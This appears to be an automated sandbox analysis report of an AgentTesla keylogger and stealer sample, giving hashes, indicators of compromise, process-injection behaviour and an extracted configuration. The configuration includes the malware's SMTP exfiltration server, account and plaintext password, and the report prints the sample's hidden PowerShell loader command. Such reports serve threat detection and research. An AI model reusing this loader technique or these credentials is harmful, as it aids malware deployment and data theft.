agenttesla | 027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2

General

Target

027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe
Size

555KB
MD5

99b3c84d119b8d3173aa52f40871a090
SHA1

029c6d4d7f5509bed4fe65e2ee961c058d896a61
SHA256

027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2
SHA512

f7e1bd7e12d6e34deb0c40bd4bdc4b69c6fc7d43feb8671212eb8ac588a3d1e26922be5edb7d28997b088f5e3bbea72b61e98cb160c7288f18e0b1ae10302448
SSDEEP

12288:ZCcSi/icxi33VLqAdQqW8sHPS9ojrO+HTG07rS:ZoiKainVPdQBSuGyG0K

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.legodimo.co.za
Port:
587
Username:
[email protected]
Password:
IFfo%142#

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.legodimo.co.za
Port:
587
Username:
[email protected]
Password:
IFfo%142#
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Loads dropped DLL 1 IoCs

Processes:

027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe

pid process

2828 027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

51 api.ipify.org
52 api.ipify.org
53 ip-api.com

pid	process
2828	027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe

flow	ioc
51	api.ipify.org
52	api.ipify.org
53	ip-api.com

Drops file in System32 directory 2 IoCs

Processes:

027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\orthopteran\inornateness.mel	027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe
File opened for modification	C:\Windows\SysWOW64\nordbrandts\bogbussens.pro	027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

3744 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1108 powershell.exe
3744 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1108 set thread context of 3744 1108 powershell.exe wab.exe

pid	process
3744	wab.exe

description	pid	process	target process
PID 1108 set thread context of 3744	1108	powershell.exe	wab.exe

Drops file in Program Files directory 3 IoCs

Processes:

027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Common Files\Lysbade6\omringe.ber	027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe
File opened for modification	C:\Program Files (x86)\Common Files\egilds.Har	027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe
File created	C:\Program Files (x86)\opalesces\Redheadedness.lnk	027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exewab.exe

pid	process
1108	powershell.exe
1108	powershell.exe
1108	powershell.exe
1108	powershell.exe
1108	powershell.exe
1108	powershell.exe
1108	powershell.exe
1108	powershell.exe
1108	powershell.exe
3744	wab.exe
3744	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1108 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exewab.exe

description pid process

Token: SeDebugPrivilege 1108 powershell.exe
Token: SeDebugPrivilege 3744 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

3744 wab.exe

description	pid	process
Token: SeDebugPrivilege	1108	powershell.exe
Token: SeDebugPrivilege	3744	wab.exe

pid	process
3744	wab.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exepowershell.exe

description	pid	process	target process
PID 2828 wrote to memory of 1108	2828	027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe	powershell.exe
PID 2828 wrote to memory of 1108	2828	027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe	powershell.exe
PID 2828 wrote to memory of 1108	2828	027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe	powershell.exe
PID 1108 wrote to memory of 2916	1108	powershell.exe	cmd.exe
PID 1108 wrote to memory of 2916	1108	powershell.exe	cmd.exe
PID 1108 wrote to memory of 2916	1108	powershell.exe	cmd.exe
PID 1108 wrote to memory of 3744	1108	powershell.exe	wab.exe
PID 1108 wrote to memory of 3744	1108	powershell.exe	wab.exe
PID 1108 wrote to memory of 3744	1108	powershell.exe	wab.exe
PID 1108 wrote to memory of 3744	1108	powershell.exe	wab.exe
PID 1108 wrote to memory of 3744	1108	powershell.exe	wab.exe

C:\Users\Admin\AppData\Local\Temp\027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe
"C:\Users\Admin\AppData\Local\Temp\027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Fikserbart=Get-Content 'C:\Users\Admin\AppData\Roaming\kraftfuldheders\Fide231\recited\Overstretch\Automobilfirmaers\Natchezan\Outreckon.Sty';$Stormlbs=$Fikserbart.SubString(56995,3);.$Stormlbs($Fikserbart)"
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1108

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
3⤵
PID:2916

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3744

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qthegpuy.op0.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsc6591.tmp\nsExec.dll
Filesize
6KB

MD5
51e63a9c5d6d230ef1c421b2eccd45dc

SHA1
c499cdad5c613d71ed3f7e93360f1bbc5748c45d

SHA256
cd8496a3802378391ec425dec424a14f5d30e242f192ec4eb022d767f9a2480f

SHA512
c23d713c3c834b3397c2a199490aed28f28d21f5781205c24df5e1e32365985c8a55be58f06979df09222740ffa51f4da764ebc3d912cd0c9d56ab6a33cab522

Download Submit
C:\Users\Admin\AppData\Roaming\kraftfuldheders\Fide231\recited\Overstretch\Automobilfirmaers\Natchezan\Outreckon.Sty
Filesize
55KB

MD5
85bee3407dc99a55d809e31f5b8822f3

SHA1
898e5873998c61dc48e6a01e43ba667f9a70f571

SHA256
2afd7f567beb13e65577a1d2ee4d6a161c4a1b01cb154c7129846d7ed74ad0c0

SHA512
06140520fedab28d7a982dc0d1563aed53b59a943131ed58cff405620c412e63f9dd7019661677bd562bd8813a09613b0e1f44752b983e953eef891af4941587

Download Submit
C:\Users\Admin\AppData\Roaming\kraftfuldheders\Fide231\recited\Overstretch\Automobilfirmaers\Natchezan\Venturesomely.Skr150
Filesize
347KB

MD5
e009275e95a08217120b862807376e4b

SHA1
f380d5f6af82197cc12325a938a5f1dff77da6cf

SHA256
23036d41bf9f2c118904568b4091253199c3d938105fb5d766dd51ffb58bd51d

SHA512
68eacd7988116c384cb8aa6bcf5023b3ff578c2756428b766d59819a356daeca8fa4f8395b4612cbe7f19257d96f8630e4ef0c366ff30d7762276c030fa7f59b

Download Submit
memory/1108-38-0x0000000006570000-0x000000000658E000-memory.dmp

Filesize
120KB

Download
memory/1108-21-0x0000000002F70000-0x0000000002FA6000-memory.dmp

Filesize
216KB

Download
memory/1108-26-0x0000000005650000-0x00000000056B6000-memory.dmp

Filesize
408KB

Download
memory/1108-27-0x0000000005F40000-0x0000000005FA6000-memory.dmp

Filesize
408KB

Download
memory/1108-24-0x0000000005760000-0x0000000005D88000-memory.dmp

Filesize
6.2MB

Download
memory/1108-37-0x00000000060B0000-0x0000000006404000-memory.dmp

Filesize
3.3MB

Download
memory/1108-23-0x0000000003040000-0x0000000003050000-memory.dmp

Filesize
64KB

Download
memory/1108-39-0x0000000006620000-0x000000000666C000-memory.dmp

Filesize
304KB

Download
memory/1108-51-0x0000000073A10000-0x00000000741C0000-memory.dmp

Filesize
7.7MB

Download
memory/1108-41-0x0000000007620000-0x00000000076B6000-memory.dmp

Filesize
600KB

Download
memory/1108-42-0x0000000006AA0000-0x0000000006ABA000-memory.dmp

Filesize
104KB

Download
memory/1108-43-0x0000000006AC0000-0x0000000006AE2000-memory.dmp

Filesize
136KB

Download
memory/1108-44-0x0000000007C70000-0x0000000008214000-memory.dmp

Filesize
5.6MB

Download
memory/1108-67-0x0000000073A10000-0x00000000741C0000-memory.dmp

Filesize
7.7MB

Download
memory/1108-46-0x00000000088A0000-0x0000000008F1A000-memory.dmp

Filesize
6.5MB

Download
memory/1108-48-0x0000000003040000-0x0000000003050000-memory.dmp

Filesize
64KB

Download
memory/1108-22-0x0000000073A10000-0x00000000741C0000-memory.dmp

Filesize
7.7MB

Download
memory/1108-50-0x0000000007A90000-0x0000000007A94000-memory.dmp

Filesize
16KB

Download
memory/1108-40-0x0000000003040000-0x0000000003050000-memory.dmp

Filesize
64KB

Download
memory/1108-25-0x00000000055B0000-0x00000000055D2000-memory.dmp

Filesize
136KB

Download
memory/1108-52-0x0000000003040000-0x0000000003050000-memory.dmp

Filesize
64KB

Download
memory/1108-55-0x0000000003040000-0x0000000003050000-memory.dmp

Filesize
64KB

Download
memory/1108-56-0x0000000003040000-0x0000000003050000-memory.dmp

Filesize
64KB

Download
memory/1108-57-0x0000000008F20000-0x000000000D220000-memory.dmp

Filesize
67.0MB

Download
memory/1108-58-0x00000000777A1000-0x00000000778C1000-memory.dmp

Filesize
1.1MB

Download
memory/1108-53-0x0000000003040000-0x0000000003050000-memory.dmp

Filesize
64KB

Download
memory/3744-76-0x0000000073A10000-0x00000000741C0000-memory.dmp

Filesize
7.7MB

Download
memory/3744-64-0x0000000000C30000-0x0000000001E84000-memory.dmp

Filesize
18.3MB

Download
memory/3744-66-0x0000000000C30000-0x0000000000C72000-memory.dmp

Filesize
264KB

Download
memory/3744-60-0x00000000777A1000-0x00000000778C1000-memory.dmp

Filesize
1.1MB

Download
memory/3744-68-0x0000000073A10000-0x00000000741C0000-memory.dmp

Filesize
7.7MB

Download
memory/3744-69-0x0000000023C90000-0x0000000023CA0000-memory.dmp

Filesize
64KB

Download
memory/3744-70-0x00000000249F0000-0x0000000024A82000-memory.dmp

Filesize
584KB

Download
memory/3744-71-0x00000000249A0000-0x00000000249F0000-memory.dmp

Filesize
320KB

Download
memory/3744-72-0x0000000024B40000-0x0000000024BDC000-memory.dmp

Filesize
624KB

Download
memory/3744-73-0x0000000024AD0000-0x0000000024ADA000-memory.dmp

Filesize
40KB

Download
memory/3744-59-0x0000000077828000-0x0000000077829000-memory.dmp

Filesize
4KB

Download
memory/3744-77-0x0000000023C90000-0x0000000023CA0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads